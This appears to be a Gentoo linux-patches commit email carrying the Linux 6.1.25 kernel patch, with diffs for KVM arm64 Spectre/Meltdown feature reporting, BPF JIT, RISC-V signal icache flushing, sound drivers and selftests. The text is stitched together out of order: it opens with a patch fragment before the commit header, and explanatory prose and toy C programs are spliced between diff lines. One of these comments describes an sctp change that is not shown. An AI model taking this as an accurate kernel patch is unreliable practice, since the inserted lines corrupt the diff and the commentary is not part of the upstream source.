+ 	.getsockopt	= sctp_getsockopt,
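
The sctp change splits the common HMAC teardown out of sctp_destruct_sock() so the IPv6 variant can run it before inet6_sock_destruct(), and copied sockets now inherit the parent's destructor verbatim. A small userspace analogue of that destructor layering (types and names invented for illustration):

    #include <stdio.h>

    struct sock { void (*destruct)(struct sock *); };

    static void common_destruct(struct sock *sk) { puts("free shared state"); }
    static void inet_destruct(struct sock *sk)   { puts("ipv4 base teardown"); }
    static void inet6_destruct(struct sock *sk)  { puts("ipv6 base teardown"); }

    /* each family runs the shared part, then its own base destructor */
    static void v4_destruct(struct sock *sk) { common_destruct(sk); inet_destruct(sk); }
    static void v6_destruct(struct sock *sk) { common_destruct(sk); inet6_destruct(sk); }

    int main(void)
    {
        struct sock v6 = { .destruct = v6_destruct };
        /* a copied socket inherits the parent's destructor, which is the
         * point of the sk->sk_destruct change above */
        struct sock clone = { .destruct = v6.destruct };
        clone.destruct(&clone);
        return 0;
    }
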
+diff --git a/rust/kernel/print.rs b/rust/kernel/print.rs
+index 97ff086ba22e9..b6d1c12136de1 100644
+--- a/rust/kernel/print.rs
++++ b/rust/kernel/print.rs
+@@ -18,7 +18,11 @@ use crate::bindings;
+ 
+ // Called from `vsprintf` with format specifier `%pA`.
+ #[no_mangle]
+-unsafe fn rust_fmt_argument(buf: *mut c_char, end: *mut c_char, ptr: *const c_void) -> *mut c_char {
++unsafe extern "C" fn rust_fmt_argument(
++    buf: *mut c_char,
++    end: *mut c_char,
++    ptr: *const c_void,
++) -> *mut c_char {
+     use fmt::Write;
+     // SAFETY: The C contract guarantees that `buf` is valid if it's less than `end`.
+     let mut w = unsafe { RawFormatter::from_ptrs(buf.cast(), end.cast()) };
+diff --git a/rust/kernel/str.rs b/rust/kernel/str.rs
+index e45ff220ae50f..2c4b4bac28f42 100644
+--- a/rust/kernel/str.rs
++++ b/rust/kernel/str.rs
+@@ -29,7 +29,7 @@ impl RawFormatter {
+     /// If `pos` is less than `end`, then the region between `pos` (inclusive) and `end`
+     /// (exclusive) must be valid for writes for the lifetime of the returned [`RawFormatter`].
+     pub(crate) unsafe fn from_ptrs(pos: *mut u8, end: *mut u8) -> Self {
+-        // INVARIANT: The safety requierments guarantee the type invariants.
++        // INVARIANT: The safety requirements guarantee the type invariants.
+         Self {
+             beg: pos as _,
+             pos: pos as _,
+diff --git a/scripts/asn1_compiler.c b/scripts/asn1_compiler.c
+index 71d4a7c879008..c3e501451b41d 100644
+--- a/scripts/asn1_compiler.c
++++ b/scripts/asn1_compiler.c
+@@ -625,7 +625,7 @@ int main(int argc, char **argv)
+ 	p = strrchr(argv[1], '/');
+ 	p = p ? p + 1 : argv[1];
+ 	grammar_name = strdup(p);
+-	if (!p) {
++	if (!grammar_name) {
+ 		perror(NULL);
+ 		exit(1);
+ 	}
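
The asn1_compiler fix tests the pointer strdup() actually returned rather than its argument. The corrected pattern, reduced to a runnable program:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        const char *p = argc > 1 ? argv[1] : "grammar.asn1";
        char *name = strdup(p);

        if (!name) {      /* test the copy, not the source pointer */
            perror(NULL);
            exit(1);
        }
        printf("%s\n", name);
        free(name);
        return 0;
    }
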
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 6a6c72b5ea26d..f70d6a33421d2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9468,6 +9468,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b65, "HP ProBook 455 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/fsl/fsl_asrc_dma.c b/sound/soc/fsl/fsl_asrc_dma.c
+index 3b81a465814a1..05a7d1588d204 100644
+--- a/sound/soc/fsl/fsl_asrc_dma.c
++++ b/sound/soc/fsl/fsl_asrc_dma.c
+@@ -209,14 +209,19 @@ static int fsl_asrc_dma_hw_params(struct snd_soc_component *component,
+ 		be_chan = soc_component_to_pcm(component_be)->chan[substream->stream];
+ 		tmp_chan = be_chan;
+ 	}
+-	if (!tmp_chan)
+-		tmp_chan = dma_request_slave_channel(dev_be, tx ? "tx" : "rx");
++	if (!tmp_chan) {
++		tmp_chan = dma_request_chan(dev_be, tx ? "tx" : "rx");
++		if (IS_ERR(tmp_chan)) {
++			dev_err(dev, "failed to request DMA channel for Back-End\n");
++			return -EINVAL;
++		}
++	}
+ 
+ 	/*
+ 	 * An EDMA DEV_TO_DEV channel is fixed and bound with DMA event of each
+ 	 * peripheral, unlike SDMA channel that is allocated dynamically. So no
+ 	 * need to configure dma_request and dma_request2, but get dma_chan of
+-	 * Back-End device directly via dma_request_slave_channel.
++	 * Back-End device directly via dma_request_chan.
+ 	 */
+ 	if (!asrc->use_edma) {
+ 		/* Get DMA request of Back-End */
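
dma_request_chan() reports failure as an ERR_PTR()-encoded pointer rather than NULL, hence the switch to IS_ERR() above; a plain NULL test would let errors slip through. A self-contained sketch of that encoding, simplified from the kernel's err.h:

    #include <stdio.h>

    #define MAX_ERRNO 4095

    static inline void *ERR_PTR(long err) { return (void *)err; }
    static inline int IS_ERR(const void *p)
    {
        return (unsigned long)p >= (unsigned long)-MAX_ERRNO;
    }

    static void *request_chan(int fail)
    {
        static int chan;
        return fail ? ERR_PTR(-19 /* -ENODEV */) : (void *)&chan;
    }

    int main(void)
    {
        void *ch = request_chan(1);

        if (!ch)
            puts("NULL check: error missed");   /* old, buggy pattern */
        if (IS_ERR(ch))
            puts("IS_ERR check: error caught"); /* fixed pattern */
        return 0;
    }
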
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index df7c0bf372451..6d88af5b287fe 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -1541,7 +1541,7 @@ static const struct fsl_sai_soc_data fsl_sai_imx8qm_data = {
+ 	.use_imx_pcm = true,
+ 	.use_edma = true,
+ 	.fifo_depth = 64,
+-	.pins = 1,
++	.pins = 4,
+ 	.reg_offset = 0,
+ 	.mclk0_is_mclk1 = false,
+ 	.flags = 0,
+diff --git a/sound/soc/sof/pm.c b/sound/soc/sof/pm.c
+index 8722bbd7fd3d7..26ffcbb6e30f4 100644
+--- a/sound/soc/sof/pm.c
++++ b/sound/soc/sof/pm.c
+@@ -183,6 +183,7 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	const struct sof_ipc_tplg_ops *tplg_ops = sdev->ipc->ops->tplg;
+ 	pm_message_t pm_state;
+ 	u32 target_state = snd_sof_dsp_power_target(sdev);
++	u32 old_state = sdev->dsp_power_state.state;
+ 	int ret;
+ 
+ 	/* do nothing if dsp suspend callback is not set */
+@@ -192,7 +193,12 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	if (runtime_suspend && !sof_ops(sdev)->runtime_suspend)
+ 		return 0;
+ 
+-	if (tplg_ops && tplg_ops->tear_down_all_pipelines)
++	/* we need to tear down pipelines only if the DSP hardware is
++	 * active, which happens for PCI devices. if the device is
++	 * suspended, it is brought back to full power and then
++	 * suspended again
++	 */
++	if (tplg_ops && tplg_ops->tear_down_all_pipelines && (old_state == SOF_DSP_PM_D0))
+ 		tplg_ops->tear_down_all_pipelines(sdev, false);
+ 
+ 	if (sdev->fw_state != SOF_FW_BOOT_COMPLETE)
+diff --git a/tools/testing/selftests/sigaltstack/current_stack_pointer.h b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+new file mode 100644
+index 0000000000000..ea9bdf3a90b16
+--- /dev/null
++++ b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+@@ -0,0 +1,23 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++
++#if __alpha__
++register unsigned long sp asm("$30");
++#elif __arm__ || __aarch64__ || __csky__ || __m68k__ || __mips__ || __riscv
++register unsigned long sp asm("sp");
++#elif __i386__
++register unsigned long sp asm("esp");
++#elif __loongarch64
++register unsigned long sp asm("$sp");
++#elif __ppc__
++register unsigned long sp asm("r1");
++#elif __s390x__
++register unsigned long sp asm("%15");
++#elif __sh__
++register unsigned long sp asm("r15");
++#elif __x86_64__
++register unsigned long sp asm("rsp");
++#elif __XTENSA__
++register unsigned long sp asm("a1");
++#else
++#error "implement current_stack_pointer equivalent"
++#endif
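
The new selftest header binds a variable to the architecture's stack-pointer register via GCC's explicit-register extension, replacing the per-test #ifdef. A minimal userspace demo of the same idea, assuming an x86-64 gcc build (other arches need a different register name, exactly as the header enumerates):

    #include <stdio.h>

    register unsigned long sp asm("rsp");

    int main(void)
    {
        unsigned long local;

        /* the live stack pointer sits at or below any local's address */
        printf("sp=%#lx &local=%p\n", sp, (void *)&local);
        return sp <= (unsigned long)&local ? 0 : 1;
    }
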
+diff --git a/tools/testing/selftests/sigaltstack/sas.c b/tools/testing/selftests/sigaltstack/sas.c
+index c53b070755b65..98d37cb744fb2 100644
+--- a/tools/testing/selftests/sigaltstack/sas.c
++++ b/tools/testing/selftests/sigaltstack/sas.c
+@@ -20,6 +20,7 @@
+ #include <sys/auxv.h>
+ 
+ #include "../kselftest.h"
++#include "current_stack_pointer.h"
+ 
+ #ifndef SS_AUTODISARM
+ #define SS_AUTODISARM  (1U << 31)
+@@ -46,12 +47,6 @@ void my_usr1(int sig, siginfo_t *si, void *u)
+ 	stack_t stk;
+ 	struct stk_data *p;
+ 
+-#if __s390x__
+-	register unsigned long sp asm("%15");
+-#else
+-	register unsigned long sp asm("sp");
+-#endif
+-
+ 	if (sp < (unsigned long)sstack ||
+ 			sp >= (unsigned long)sstack + stack_size) {
+ 		ksft_exit_fail_msg("SP is not on sigaltstack\n");
+diff --git a/tools/vm/page_owner_sort.c b/tools/vm/page_owner_sort.c
+index ce860ab941629..58ebfe3924024 100644
+--- a/tools/vm/page_owner_sort.c
++++ b/tools/vm/page_owner_sort.c
+@@ -847,7 +847,7 @@ int main(int argc, char **argv)
+ 			if (cull & CULL_PID || filter & FILTER_PID)
+ 				fprintf(fout, ", PID %d", list[i].pid);
+ 			if (cull & CULL_TGID || filter & FILTER_TGID)
+-				fprintf(fout, ", TGID %d", list[i].pid);
++				fprintf(fout, ", TGID %d", list[i].tgid);
+ 			if (cull & CULL_COMM || filter & FILTER_COMM)
+ 				fprintf(fout, ", task_comm_name: %s", list[i].comm);
+ 			if (cull & CULL_ALLOCATOR) {


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-20 11:16 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-04-20 11:16 UTC (permalink / raw
  To: gentoo-commits

commit:     d5133631466633c79fa9f707ee966222cefacab2
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 20 11:16:06 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr 20 11:16:06 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d5133631

Linux patch 6.1.25

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1024_linux-6.1.25.patch | 5046 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5050 insertions(+)

diff --git a/0000_README b/0000_README
index ef975a1f..7c4d9865 100644
--- a/0000_README
+++ b/0000_README
@@ -139,6 +139,10 @@ Patch:  1023_linux-6.1.24.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.24
 
+Patch:  1024_linux-6.1.25.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.25
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1024_linux-6.1.25.patch b/1024_linux-6.1.25.patch
new file mode 100644
index 00000000..8ae9ea8a
--- /dev/null
+++ b/1024_linux-6.1.25.patch
@@ -0,0 +1,5046 @@
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index e7b3fa7bb3f73..4ecb549fd052e 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -337,6 +337,8 @@ tcp_app_win - INTEGER
+ 	Reserve max(window/2^tcp_app_win, mss) of window for application
+ 	buffer. Value 0 is special, it means that nothing is reserved.
+ 
++	Possible values are [0, 31], inclusive.
++
+ 	Default: 31
+ 
+ tcp_autocorking - BOOLEAN
+diff --git a/Documentation/sound/hd-audio/models.rst b/Documentation/sound/hd-audio/models.rst
+index 9b52f50a68542..1204304500147 100644
+--- a/Documentation/sound/hd-audio/models.rst
++++ b/Documentation/sound/hd-audio/models.rst
+@@ -704,7 +704,7 @@ ref
+ no-jd
+     BIOS setup but without jack-detection
+ intel
+-    Intel DG45* mobos
++    Intel D*45* mobos
+ dell-m6-amic
+     Dell desktops/laptops with analog mics
+ dell-m6-dmic
+diff --git a/Makefile b/Makefile
+index 4f9939dec2c26..1a4c4af370db8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 24
++SUBLEVEL = 25
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts b/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
+index 193569f0ca5f7..4bdadb7681c30 100644
+--- a/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
++++ b/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
+@@ -26,6 +26,16 @@
+ 	};
+ 
+ 	reserved-memory {
++		sbl_region: sbl@2f00000 {
++			reg = <0x02f00000 0x100000>;
++			no-map;
++		};
++
++		external_image_region: external-image@3100000 {
++			reg = <0x03100000 0x200000>;
++			no-map;
++		};
++
+ 		adsp_region: adsp@3300000 {
+ 			reg = <0x03300000 0x1400000>;
+ 			no-map;
+diff --git a/arch/arm/lib/uaccess_with_memcpy.c b/arch/arm/lib/uaccess_with_memcpy.c
+index 14eecaaf295fa..e4c2677cc1e9e 100644
+--- a/arch/arm/lib/uaccess_with_memcpy.c
++++ b/arch/arm/lib/uaccess_with_memcpy.c
+@@ -116,7 +116,7 @@ __copy_to_user_memcpy(void __user *to, const void *from, unsigned long n)
+ 			tocopy = n;
+ 
+ 		ua_flags = uaccess_save_and_enable();
+-		memcpy((void *)to, from, tocopy);
++		__memcpy((void *)to, from, tocopy);
+ 		uaccess_restore(ua_flags);
+ 		to += tocopy;
+ 		from += tocopy;
+@@ -178,7 +178,7 @@ __clear_user_memset(void __user *addr, unsigned long n)
+ 			tocopy = n;
+ 
+ 		ua_flags = uaccess_save_and_enable();
+-		memset((void *)addr, 0, tocopy);
++		__memset((void *)addr, 0, tocopy);
+ 		uaccess_restore(ua_flags);
+ 		addr += tocopy;
+ 		n -= tocopy;
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 94d33e296e10c..6ce6888cf73d6 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -1870,12 +1870,33 @@ static int do_pkvm_init(u32 hyp_va_bits)
+ 	return ret;
+ }
+ 
+-static int kvm_hyp_init_protection(u32 hyp_va_bits)
++static u64 get_hyp_id_aa64pfr0_el1(void)
+ {
+-	void *addr = phys_to_virt(hyp_mem_base);
+-	int ret;
++	/*
++	 * Track whether the system isn't affected by spectre/meltdown in the
++	 * hypervisor's view of id_aa64pfr0_el1, used for protected VMs.
++	 * Although this is per-CPU, we make it global for simplicity, e.g., not
++	 * to have to worry about vcpu migration.
++	 *
++	 * Unlike for non-protected VMs, userspace cannot override this for
++	 * protected VMs.
++	 */
++	u64 val = read_sanitised_ftr_reg(SYS_ID_AA64PFR0_EL1);
++
++	val &= ~(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2) |
++		 ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3));
++
++	val |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2),
++			  arm64_get_spectre_v2_state() == SPECTRE_UNAFFECTED);
++	val |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3),
++			  arm64_get_meltdown_state() == SPECTRE_UNAFFECTED);
++
++	return val;
++}
+ 
+-	kvm_nvhe_sym(id_aa64pfr0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64PFR0_EL1);
++static void kvm_hyp_init_symbols(void)
++{
++	kvm_nvhe_sym(id_aa64pfr0_el1_sys_val) = get_hyp_id_aa64pfr0_el1();
+ 	kvm_nvhe_sym(id_aa64pfr1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64PFR1_EL1);
+ 	kvm_nvhe_sym(id_aa64isar0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64ISAR0_EL1);
+ 	kvm_nvhe_sym(id_aa64isar1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64ISAR1_EL1);
+@@ -1883,6 +1904,12 @@ static int kvm_hyp_init_protection(u32 hyp_va_bits)
+ 	kvm_nvhe_sym(id_aa64mmfr0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64MMFR0_EL1);
+ 	kvm_nvhe_sym(id_aa64mmfr1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64MMFR1_EL1);
+ 	kvm_nvhe_sym(id_aa64mmfr2_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64MMFR2_EL1);
++}
++
++static int kvm_hyp_init_protection(u32 hyp_va_bits)
++{
++	void *addr = phys_to_virt(hyp_mem_base);
++	int ret;
+ 
+ 	ret = create_hyp_mappings(addr, addr + hyp_mem_size, PAGE_HYP);
+ 	if (ret)
+@@ -2057,6 +2084,8 @@ static int init_hyp_mode(void)
+ 		cpu_prepare_hyp_mode(cpu);
+ 	}
+ 
++	kvm_hyp_init_symbols();
++
+ 	if (is_protected_kvm_enabled()) {
+ 		init_cpu_logical_map();
+ 
+@@ -2064,9 +2093,7 @@ static int init_hyp_mode(void)
+ 			err = -ENODEV;
+ 			goto out_err;
+ 		}
+-	}
+ 
+-	if (is_protected_kvm_enabled()) {
+ 		err = kvm_hyp_init_protection(hyp_va_bits);
+ 		if (err) {
+ 			kvm_err("Failed to init hyp memory protection\n");
+diff --git a/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h b/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
+index 07edfc7524c94..37440e1dda930 100644
+--- a/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
++++ b/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
+@@ -33,11 +33,14 @@
+  * Allow for protected VMs:
+  * - Floating-point and Advanced SIMD
+  * - Data Independent Timing
++ * - Spectre/Meltdown Mitigation
+  */
+ #define PVM_ID_AA64PFR0_ALLOW (\
+ 	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_FP) | \
+ 	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_AdvSIMD) | \
+-	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_DIT) \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_DIT) | \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2) | \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3) \
+ 	)
+ 
+ /*
+diff --git a/arch/arm64/kvm/hyp/nvhe/sys_regs.c b/arch/arm64/kvm/hyp/nvhe/sys_regs.c
+index 0f9ac25afdf40..3d5121ee39777 100644
+--- a/arch/arm64/kvm/hyp/nvhe/sys_regs.c
++++ b/arch/arm64/kvm/hyp/nvhe/sys_regs.c
+@@ -84,19 +84,12 @@ static u64 get_restricted_features_unsigned(u64 sys_reg_val,
+ 
+ static u64 get_pvm_id_aa64pfr0(const struct kvm_vcpu *vcpu)
+ {
+-	const struct kvm *kvm = (const struct kvm *)kern_hyp_va(vcpu->kvm);
+ 	u64 set_mask = 0;
+ 	u64 allow_mask = PVM_ID_AA64PFR0_ALLOW;
+ 
+ 	set_mask |= get_restricted_features_unsigned(id_aa64pfr0_el1_sys_val,
+ 		PVM_ID_AA64PFR0_RESTRICT_UNSIGNED);
+ 
+-	/* Spectre and Meltdown mitigation in KVM */
+-	set_mask |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2),
+-			       (u64)kvm->arch.pfr0_csv2);
+-	set_mask |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3),
+-			       (u64)kvm->arch.pfr0_csv3);
+-
+ 	return (id_aa64pfr0_el1_sys_val & allow_mask) | set_mask;
+ }
+ 
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index 67770375c5eed..ed12c5355afbb 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -531,6 +531,7 @@ void kvm_pmu_handle_pmcr(struct kvm_vcpu *vcpu, u64 val)
+ 		for_each_set_bit(i, &mask, 32)
+ 			kvm_pmu_set_counter_value(vcpu, i, 0);
+ 	}
++	kvm_vcpu_pmu_restore_guest(vcpu);
+ }
+ 
+ static bool kvm_pmu_counter_is_enabled(struct kvm_vcpu *vcpu, u64 select_idx)
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index 1f80e17a64608..457e74f1f6717 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -707,7 +707,6 @@ static bool access_pmcr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ 		if (!kvm_supports_32bit_el0())
+ 			val |= ARMV8_PMU_PMCR_LC;
+ 		kvm_pmu_handle_pmcr(vcpu, val);
+-		kvm_vcpu_pmu_restore_guest(vcpu);
+ 	} else {
+ 		/* PMCR.P & PMCR.C are RAZ */
+ 		val = __vcpu_sys_reg(vcpu, PMCR_EL0)
+diff --git a/arch/arm64/net/bpf_jit.h b/arch/arm64/net/bpf_jit.h
+index a6acb94ea3d63..c2edadb8ec6a3 100644
+--- a/arch/arm64/net/bpf_jit.h
++++ b/arch/arm64/net/bpf_jit.h
+@@ -281,4 +281,8 @@
+ /* DMB */
+ #define A64_DMB_ISH aarch64_insn_gen_dmb(AARCH64_INSN_MB_ISH)
+ 
++/* ADR */
++#define A64_ADR(Rd, offset) \
++	aarch64_insn_gen_adr(0, offset, Rd, AARCH64_INSN_ADR_TYPE_ADR)
++
+ #endif /* _BPF_JIT_H */
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 30f76178608b3..8f16217c111c8 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -1905,7 +1905,8 @@ static int prepare_trampoline(struct jit_ctx *ctx, struct bpf_tramp_image *im,
+ 		restore_args(ctx, args_off, nargs);
+ 		/* call original func */
+ 		emit(A64_LDR64I(A64_R(10), A64_SP, retaddr_off), ctx);
+-		emit(A64_BLR(A64_R(10)), ctx);
++		emit(A64_ADR(A64_LR, AARCH64_INSN_SIZE * 2), ctx);
++		emit(A64_RET(A64_R(10)), ctx);
+ 		/* store return value */
+ 		emit(A64_STR64I(A64_R(0), A64_SP, retval_off), ctx);
+ 		/* reserve a nop for bpf_tramp_image_put */
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index 2467bfb8889a9..82b4402810da0 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -955,6 +955,10 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 		emit_atomic(insn, ctx);
+ 		break;
+ 
++	/* Speculation barrier */
++	case BPF_ST | BPF_NOSPEC:
++		break;
++
+ 	default:
+ 		pr_err("bpf_jit: unknown opcode %02x\n", code);
+ 		return -EINVAL;
+diff --git a/arch/powerpc/mm/numa.c b/arch/powerpc/mm/numa.c
+index b44ce71917d75..16cfe56be05bb 100644
+--- a/arch/powerpc/mm/numa.c
++++ b/arch/powerpc/mm/numa.c
+@@ -366,6 +366,7 @@ void update_numa_distance(struct device_node *node)
+ 	WARN(numa_distance_table[nid][nid] == -1,
+ 	     "NUMA distance details for node %d not provided\n", nid);
+ }
++EXPORT_SYMBOL_GPL(update_numa_distance);
+ 
+ /*
+  * ibm,numa-lookup-index-table= {N, domainid1, domainid2, ..... domainidN}
+diff --git a/arch/powerpc/platforms/pseries/papr_scm.c b/arch/powerpc/platforms/pseries/papr_scm.c
+index 2f8385523a132..1a53e048ceb76 100644
+--- a/arch/powerpc/platforms/pseries/papr_scm.c
++++ b/arch/powerpc/platforms/pseries/papr_scm.c
+@@ -1428,6 +1428,13 @@ static int papr_scm_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
++	/*
++	 * open firmware platform device create won't update the NUMA 
++	 * distance table. For PAPR SCM devices we use numa_map_to_online_node()
++	 * to find the nearest online NUMA node and that requires correct
++	 * distance table information.
++	 */
++	update_numa_distance(dn);
+ 
+ 	p = kzalloc(sizeof(*p), GFP_KERNEL);
+ 	if (!p)
+diff --git a/arch/riscv/kernel/signal.c b/arch/riscv/kernel/signal.c
+index bfb2afa4135f8..dee66c9290cce 100644
+--- a/arch/riscv/kernel/signal.c
++++ b/arch/riscv/kernel/signal.c
+@@ -19,6 +19,7 @@
+ #include <asm/signal32.h>
+ #include <asm/switch_to.h>
+ #include <asm/csr.h>
++#include <asm/cacheflush.h>
+ 
+ extern u32 __user_rt_sigreturn[2];
+ 
+@@ -181,6 +182,7 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ {
+ 	struct rt_sigframe __user *frame;
+ 	long err = 0;
++	unsigned long __maybe_unused addr;
+ 
+ 	frame = get_sigframe(ksig, regs, sizeof(*frame));
+ 	if (!access_ok(frame, sizeof(*frame)))
+@@ -209,7 +211,12 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ 	if (copy_to_user(&frame->sigreturn_code, __user_rt_sigreturn,
+ 			 sizeof(frame->sigreturn_code)))
+ 		return -EFAULT;
+-	regs->ra = (unsigned long)&frame->sigreturn_code;
++
++	addr = (unsigned long)&frame->sigreturn_code;
++	/* Make sure the two instructions are pushed to icache. */
++	flush_icache_range(addr, addr + sizeof(frame->sigreturn_code));
++
++	regs->ra = addr;
+ #endif /* CONFIG_MMU */
+ 
+ 	/*
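
The riscv fix flushes the icache range covering the just-copied sigreturn trampoline so stale instruction cache lines cannot be executed. Userspace code that writes instructions has the same obligation; gcc and clang expose it as __builtin___clear_cache(). Illustrative only, nothing is executed here:

    #include <string.h>

    int main(void)
    {
        static const unsigned char trampoline[8] = { 0 }; /* stand-in bytes */
        unsigned char buf[sizeof(trampoline)];

        memcpy(buf, trampoline, sizeof(buf));
        /* make the new bytes visible to the instruction fetcher */
        __builtin___clear_cache((char *)buf, (char *)buf + sizeof(buf));
        return 0;
    }
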
+diff --git a/arch/x86/include/asm/hyperv-tlfs.h b/arch/x86/include/asm/hyperv-tlfs.h
+index 3089ec352743b..c5e0e5a06c0dc 100644
+--- a/arch/x86/include/asm/hyperv-tlfs.h
++++ b/arch/x86/include/asm/hyperv-tlfs.h
+@@ -598,6 +598,28 @@ struct hv_enlightened_vmcs {
+ 
+ #define HV_VMX_ENLIGHTENED_CLEAN_FIELD_ALL			0xFFFF
+ 
++/*
++ * Hyper-V uses the software reserved 32 bytes in VMCB control area to expose
++ * SVM enlightenments to guests.
++ */
++struct hv_vmcb_enlightenments {
++	struct __packed hv_enlightenments_control {
++		u32 nested_flush_hypercall:1;
++		u32 msr_bitmap:1;
++		u32 enlightened_npt_tlb: 1;
++		u32 reserved:29;
++	} __packed hv_enlightenments_control;
++	u32 hv_vp_id;
++	u64 hv_vm_id;
++	u64 partition_assist_page;
++	u64 reserved;
++} __packed;
++
++/*
++ * Hyper-V uses the software reserved clean bit in VMCB.
++ */
++#define HV_VMCB_NESTED_ENLIGHTENMENTS		31
++
+ struct hv_partition_assist_pg {
+ 	u32 tlb_lock_count;
+ };
+diff --git a/arch/x86/include/asm/svm.h b/arch/x86/include/asm/svm.h
+index 236fda748ae96..02aac78cb21d4 100644
+--- a/arch/x86/include/asm/svm.h
++++ b/arch/x86/include/asm/svm.h
+@@ -5,6 +5,8 @@
+ #include <uapi/asm/svm.h>
+ #include <uapi/asm/kvm.h>
+ 
++#include <asm/hyperv-tlfs.h>
++
+ /*
+  * 32-bit intercept words in the VMCB Control Area, starting
+  * at Byte offset 000h.
